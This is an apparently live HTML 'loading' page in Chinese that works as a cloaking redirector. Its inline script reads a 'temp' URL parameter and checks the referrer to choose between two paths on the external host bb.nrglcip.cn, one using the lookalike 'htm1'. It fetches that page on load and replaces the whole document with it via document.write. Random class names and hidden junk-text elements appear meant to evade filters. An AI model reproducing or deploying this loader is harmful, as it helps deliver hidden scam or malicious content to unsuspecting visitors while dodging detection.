<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Sp5K8Eb69DA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Sp5K8Eb69DA .qraNfUhDXr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Sp5K8Eb69DA .content {
            line-height: 50px;
            text-align: center
        }

        .Sp5K8Eb69DA .img {
            width: 100%
        }

        .Sp5K8Eb69DA .XgE0yxQt2 {
            text-align: center
        }

        .Sp5K8Eb69DA .XgE0yxQt2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Sp5K8Eb69DA .XgE0yxQt2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Sp5K8Eb69DA .XgE0yxQt2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Sp5K8Eb69DA .XgE0yxQt2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Sp5K8Eb69DA .XgE0yxQt2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Sp5K8Eb69DA .XgE0yxQt2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Sp5K8Eb69DA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PVqyxyWdu2P2L(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var sujB88r = PVqyxyWdu2P2L('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ sujB88r +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ sujB88r +".html?a=share";
		}
		
        fjqVtwnt=url+"#"+new Date().getTime();
        fjqVtwnt && function() {
            $.get(fjqVtwnt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>sx1OUxfK71Gx65lfdttDViggY7MKWsvIE2NGiMQJLxqpSAioLWoKhoXQyucHTlW7N9uaBtTRWwmiG8o</a>
<li style='display:none' >Dz31eTs2hfH83wZFklUhbZrFlCXMrF9wjTQTxOZQOjzobk0iKr0ykXuUTxkIkCTWs2kldMM80G3NDwME0lE03aDyt4HbMZK</li>
<span style='display:none'>JKRD2QFpbxyjtT3XXfhlqDkLcH6J206lTtzO7W0cWAVXvSKFY3BYfrz2AVqxJJlJGHdVDp</span><div class="Sp5K8Eb69DA">
    <div class="qraNfUhDXr">
        <div class="XgE0yxQt2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>tGzav0m9cO049MW5qbOvmdNEIemzeNgLhOmvEjcb</p>
<h1 style='display:none' >V3LQWZTKMH7DDVAIgoKI5nPjYIOOWgax4tWg6O8dmteTJehXqU1zkT0F94rTorG00TBBsZPtglPj107FsXd</h1>
<a  href='#' style='display:none'>kDEiVjbfJsib2ZrAWxOF3Ik0</a>
<p  style='display:none'>tGzav0m9cO049MW5qbOvmdNEIemzeNgLhOmvEjcb</p>
<b style='display:none' >B3rkCeKeL3NtOcl9VoXI4Yl2tLMKcKK7xOPVdmHUcFMXJGmMYsb9Jxav6ciXciqxoWoM6VbKirmWAzczz</b></body>
</html>